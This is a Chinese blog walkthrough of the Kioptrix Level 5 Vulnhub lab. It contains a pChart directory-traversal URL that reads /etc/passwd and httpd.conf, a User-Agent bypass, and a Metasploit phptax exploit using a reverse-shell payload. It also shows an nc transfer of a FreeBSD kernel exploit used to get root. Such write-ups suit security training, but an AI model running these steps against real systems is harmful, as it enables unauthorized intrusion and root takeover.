当前位置: 首页 > article >正文

【Vulnhub靶场】Kioptrix Level 5

目标

本地IP:192.168.118.128

目标IP:192.168.118.0/24

信息收集

nmap探测存活主机,扫全端口,扫服务

首先探测到目标ip为:192.168.118.136

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.136

nmap -sV -A 192.168.118.136

web渗透

访问web服务192.168.118.136 和192.168.118.136:8080 ,发现web页面都无用

打开源代码查看,发现有一个可拼接的url

拼接url,访问 192.168.118.136/pChart2.1.3/index.php,发现页面也没有可利用的东西

查询pChart漏洞

将此文件拷贝到桌面打开查看

locate php/webapps/31173.txt

/usr/share/exploitdb/exploits/php/webapps/31173.txt

cp /usr/share/exploitdb/exploits/php/webapps/31173.txt /root/Desktop

vim 31173.txt

 里面说明了里面有目录遍历漏洞,并给出了漏洞利用方式

构造下面的路径访问

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fetc/passwd

发现没有什么用处

访问此路径查询apache配置文件

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

 里面这个内容显示出 User-Agent

我们使用BurpSuite,修改浏览器的 User-Agent信息,再次去访问web服务:192.168.118.136:8080,看看会不会有和刚才不一样的结果

将所有的数据包全部如下修改

点击里面唯一的连接,最终得到如下页面

尝试查询 phptax 漏洞

searchsploit phptax

MSF利用漏洞

启动msf,查询漏洞,使用漏洞,设置参数,设置payload ,设置payload参数,运行

msfconsole
use exploit/multi/http/phptax_exec
show options
set rhosts 192.168.118.136
set rport 8080
show payloads
set payload cmd/unix/reverse
set lhost 192.168.118.128
set useragent Mozilla/4.0 Mozilla4_browser
run

最后利用成功,得到shell,输入whoami,为用户www 

提权

查询系统内核版本等信息

uname -a

 查询 FreeBSD 漏洞

searchsploit FreeBSD 9.0

将此漏洞利用脚本拷贝到桌面

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c /root/Desktop

使用NC将此漏洞利用脚本上传到目标服务器,然后退出连接,重新run到shell上

nc -lvnp 8888 < 28718.c

nc -nv 192.168.118.128 8888 > exp.c

 编译运行,提权成功


http://www.kler.cn/news/360813.html

相关文章:

  • 【算法】深入了解 CRC 校验码的计算过程
  • 【计网笔记】应用层
  • 深度学习的高级应用
  • 1791. 找出星型图的中心节点
  • [云] Project Analysis
  • 【Vue3】将 Element Plus 引入 Vue3 项目
  • minio
  • 手机功耗技术点
  • 关于本地项目推送到Gitee时可能报的错误
  • 微软的 Drasi:一种轻量级的事件驱动编程方法
  • Go:error处理机制和函数
  • uniapp项目结构基本了解
  • 【不要离开你的舒适圈】:猛兽才希望你落单,亲人总让你回家,4个维度全面构建舒适圈矩阵
  • 肉桂酰辅酶A还原酶Cinnamoyl-CoA Reductases(CCR)表征及晶体-文献精读70
  • 三部门联合推铁路电子客票,百望云率先完成产品配置,助力财务服务数智化升级
  • 生命科学的前沿挑战与未来机遇
  • 深入了解路由
  • Spring模块详解Ⅴ(Spring ORM Spring Transaction)
  • TikTok防关联矩阵引流系统:实现tk账号自动化运营
  • Xmind一款极简思维导图和头脑风暴软件,支持PC和移动端,Xmind 2024.10.01101版本如何升级到Pro版?简单操作,最新可用!